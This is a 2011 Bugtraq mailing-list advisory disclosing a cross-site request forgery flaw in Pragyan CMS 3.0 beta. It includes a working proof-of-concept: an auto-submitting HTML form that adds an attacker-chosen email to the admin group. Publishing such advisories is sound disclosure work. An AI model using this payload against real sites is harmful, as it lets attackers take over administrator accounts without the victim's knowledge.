[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22855: XSRF (CSRF) in Pragyan CMS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: HTB22855: XSRF (CSRF) in Pragyan CMS
From: advisory@xxxxxxxxxxx
Date: Thu, 3 Mar 2011 12:50:31 +0100 (CET)

Vulnerability ID: HTB22855
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_pragyan_cms.html
Product: Pragyan CMS
Vendor: Pragyan Team ( http://sourceforge.net/projects/pragyan/ ) 
Vulnerable Version: v.3.0 beta
Vendor Notification: 17 February 2011 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "cms/admin.lib.php" script to 
properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is 
available:

<form 
action="http://host/?page=/&action=admin&subaction=editgroups&groupname=admin"; 
method="post" name="main">
<input type="hidden" name="txtUserEmail" value="myemail@xxxxxxxxxxx+-">
<input type="hidden" name="btnAddUserToGroup" value="Add User to Group">
</form>
<script>
document.main.submit();
</script>

Prev by Date: HTB22866: XSS vulnerability in xtcModified
Next by Date: HTB22856: XSS vulnerability in Pragyan CMS
Previous by thread: HTB22866: XSS vulnerability in xtcModified
Next by thread: HTB22856: XSS vulnerability in Pragyan CMS
Index(es):
- Date
- Thread